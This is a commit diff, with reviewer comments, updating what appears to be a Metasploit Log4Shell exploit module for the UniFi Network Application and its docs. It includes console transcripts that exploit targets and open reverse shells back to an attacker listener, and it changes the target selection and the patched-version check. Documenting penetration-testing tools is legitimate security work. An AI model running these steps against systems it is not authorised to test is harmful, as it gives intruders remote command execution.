Update docs, note OS X support
This commit is contained in:
parent
ba469a4b2c
commit
579627f5c7
@ -1,7 +1,7 @@
## Vulnerable Application

### Description
The Ubiquiti Unifi Controller application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.

@ -10,7 +10,7 @@ This module will start an LDAP server that the target will need to connect to.
### Setup

1. Either install the Windows application, or start the docker container (use jacobalberty/unifi:v6.5.53).
2. Navigate to the service on HTTPS port 8443 to setup the Unifi controller.
2. Navigate to the service on HTTPS port 8443 to setup the UniFi controller.
3. On step 2, select the button to "Switch to Advanced Setup"
4. While still on step 2, disable the remote access and "Use your Ubiquiti account for local access" options, then
create a local account.
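Review bot: step 1 of Setup still offers only the Windows installer or the Docker image, yet this commit adds an OS X scenario (UniFi Network Application v5.14.22 on OSX 11.2.3) further down; add a macOS install option here, e.g. "1. Either install the Windows or macOS application, or start the docker container (...)", and point at the community.ui.com releases page that the next hunk's context line already links so readers know where the older 5.14.22 build comes from.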
@ -29,16 +29,16 @@ Older versions of the UniFi Network Application can be downloaded from [communit

## Scenarios

### Unifi Controller on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.55, v6.0.45, and v5.14.23 all contain the fix for this
### UniFi Network Application v6.6.53 on Docker
This uses jacobalberty/unifi:v6.5.53. Note that tags v6.5.54, v6.0.45, and v5.14.23 all contain the fix for this
vulnerability. See [jacobalberty/unifi](https://hub.docker.com/r/jacobalberty/unifi) for more information.


```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
[*] Using configured payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Linux
TARGET => Linux
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set TARGET Unix
TARGET => Unix
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set RHOST 192.168.250.6
RHOST => 192.168.250.6
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > set SRVHOST 192.168.250.134
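Review bot: the new heading reads "v6.6.53 on Docker" while the paragraph under it and the Setup step use jacobalberty/unifi:v6.5.53, and the Windows heading in this same commit says v6.5.53; this looks like a typo for v6.5.53 and will mislead anyone matching the scenario to the image tag. Two smaller points: the fixed-tag list changes v6.5.55 to v6.5.54, which now agrees with the check-method boundary in the module hunk (versions after 6.5.53 are patched), and the transcript still prints `[*] Using configured payload windows/meterpreter/reverse_tcp` right after `use`, which is the old Windows default; with `'DefaultTarget' => 1` a fresh `use` will not print that, so re-capture this session against the committed module rather than keeping the old lines above `set TARGET Unix`.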
@ -64,7 +64,7 @@ pwd
/usr/lib/unifi
```

### Unifi Controler on Windows Server 2016
### UniFi Network Application v6.5.53 on Windows Server 2016

```
msf6 > use exploit/multi/http/ubiquiti_unifi_log4shell
@ -104,4 +104,53 @@ Meterpreter : x86/windows
meterpreter >
```

### UniFi Network Application v5.14.22 on OSX 11.2.3

```
msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > show options

Module options (exploit/multi/http/ubiquiti_unifi_log4shell):

Name Current Setting Required Description
---- --------------- -------- -----------
LDIF_FILE no Directory LDIF file path
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 111.111.1.11 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 8443 yes The target port (TCP)
SRVHOST 222.222.2.222 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 389 yes The local port to listen on.
SSL true no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path
VHOST no HTTP server virtual host


Payload options (cmd/unix/reverse_zsh):

Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 222.222.2.222 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port


Exploit target:

Id Name
-- ----
2 Unix


msf6 exploit(multi/http/ubiquiti_unifi_log4shell) > run

[*] Started reverse TCP handler on 222.222.2.222:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[+] Delivering the serialized Java object to execute the payload...
[*] Client sent unexpected request 2
[*] Command shell session 2 opened (222.222.2.222:4444 -> 111.111.1.11:50474 ) at 2022-01-20 07:20:22 -0500
[*] Server stopped.

id
uid=501(yourmom) gid=20(staff) groups=20(staff),501(access_bpf),12(everyone),61(localaccounts),79(_appserverusr),80(admin),81(_appserveradm),98(_lpadmin),399(com.apple.access_ssh),701(com.apple.sharepoint.group.1),33(_appstore),100(_lpoperator),204(_developer),250(_analyticsusers),395(com.apple.access_ftp),398(com.apple.access_screensharing),400(com.apple.access_remote_ae)
```

[1]: https://community.ui.com/releases?q=network+application

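Review bot: the `show options` output lists the exploit target as `2 Unix`, but the Targets array in the module hunk below has Windows at index 0 and the renamed Unix target at index 1 (`'DefaultTarget' => 1`), so this transcript appears to come from a different revision of the module; re-run it against the committed code before merging. Three smaller points: the heading says "OSX 11.2.3" whereas Apple's name for version 11 is macOS, so "macOS 11.2.3" is the accurate label; the RHOSTS/SRVHOST values 111.111.1.11 and 222.222.2.222 are neither private nor documentation-reserved addresses, unlike the 192.168.250.x range used in the other scenarios, so use the same lab range or an RFC 5737 block; and the `id` line exposes a real local account name plus a long group list that adds nothing to the walkthrough, so trim it to the uid/gid portion.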
@ -11,9 +11,9 @@ class MetasploitModule < Msf::Exploit::Remote

def initialize(_info = {})
super(
'Name' => 'Unifi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',
'Description' => %q{
The Ubiquiti Unifi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell
vulnerability whereby a JNDI string can be sent to the server that will cause it to connect to the attacker and
deserialize a malicious Java object. This results in OS command execution.

@ -37,6 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
'SSL' => true,
'WfsDelay' => 30
},
'DefaultTarget' => 1,
'Targets' => [
[
'Windows', {
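Review bot: `'DefaultTarget' => 1` flips the default from Windows (index 0) to the Unix target, so every fresh `use` now selects a cmd/unix payload and Windows installs require an explicit `set TARGET Windows`; the Windows Server 2016 scenario in the docs should show that line (the docs hunk there stops right after `use`), and a one-line comment next to DefaultTarget stating that the unix target covers Linux, Docker and the newly documented macOS install would make the choice self-explanatory to the next maintainer.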
@ -44,7 +45,7 @@ class MetasploitModule < Msf::Exploit::Remote
},
],
[
'Linux', {
'Unix', {
'Platform' => 'unix',
'Arch' => [ARCH_CMD],
'DefaultOptions' => {
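Review bot: renaming the target from 'Linux' to 'Unix' changes the string users pass to `set TARGET`, so any saved resource script or automation that still runs `set TARGET Linux` will fail once this lands; call the rename out in the PR description or changelog entry. The rename itself is accurate: the target keeps `'Platform' => 'unix'` with `ARCH_CMD`, which is what lets the same command payloads reach the macOS install added to the docs scenarios.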
@ -85,8 +86,8 @@ class MetasploitModule < Msf::Exploit::Remote
server_version = Rex::Version.new(server_version)
if server_version < Rex::Version.new('5.13.29')
return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')
elsif server_version > Rex::Version.new('6.5.54')
return Exploit::CheckCode::Safe('Versions after 6.5.54 are patched and not affected.')
elsif server_version > Rex::Version.new('6.5.53')
return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')
end

vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')
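Review bot: moving the comparison from `> 6.5.54` to `> 6.5.53` means 6.5.54 is now reported Safe, which matches the docs' statement that tag v6.5.54 contains the fix and the 5.13.29 through 6.5.53 range in the description; since this is exactly the edge the check must get right, add a spec that feeds the two boundary versions through this method and asserts 6.5.53 does not return Safe while 6.5.54 does. The lower bound (`< 5.13.29` returns Safe) is unchanged, so the affected range remains inclusive at both ends as the description states.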